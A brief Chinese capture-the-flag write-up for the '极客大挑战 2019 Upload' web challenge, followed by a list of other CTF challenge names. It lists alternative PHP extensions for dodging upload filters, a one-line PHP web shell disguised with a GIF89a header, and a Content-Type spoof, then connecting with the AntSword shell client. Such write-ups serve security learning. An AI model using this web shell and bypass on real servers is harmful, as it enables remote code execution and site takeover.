[极客大挑战 2019] Upload
1:某些情况下绕过后缀名检测:
php,php3,php4,php5,phtml.pht
2:常用一句话:
GIF89a? <script language="php">eval($_REQUEST[1])</script>
php5 适用
3:文件类型绕过
改成 image/png
上传之后蚁剑连接即可
- 强网杯 2019随便注
- 极客大挑战 2019PHP
- 网鼎杯 2020 青龙组AreUSerialz
- 强网杯 2019Upload
- GXYCTF2019 Ping Ping Ping
- 护网杯 2018 easy_tornado
- 极客大挑战 2019 Secret File
- GYCTF2020 Blacklist
- 极客大挑战 2019 HardSQL
- GXYCTF2019 BabySQli
- 网鼎杯 2018 Fakebook
- CISCN2019 华北赛区 Day2 Web1 Hack World
- RoarCTF 2019Easy Calc
- 极客大挑战 2019 Upload
- HCTF 2018 admin
- 极客大挑战 2019 BuyFlag
- BJDCTF2020 Easy MD5
- ZJCTF 2019 NiZhuanSiWei
- SUCTF 2019 CheckIn
- BUUCTF 2018 Online Tool
- GXYCTF2019 BabyUpload
- RoarCTF 2019 Easy Java
- 强网杯 2019 高明的黑客
- GXYCTF2019 禁止套娃
- GWCTF2019 我有一个数据库
- BJDCTF2020 The mystery of ip
- BJDCTF2020 ZJCTF,不过如此
- BJDCTF2020 Mark loves cat
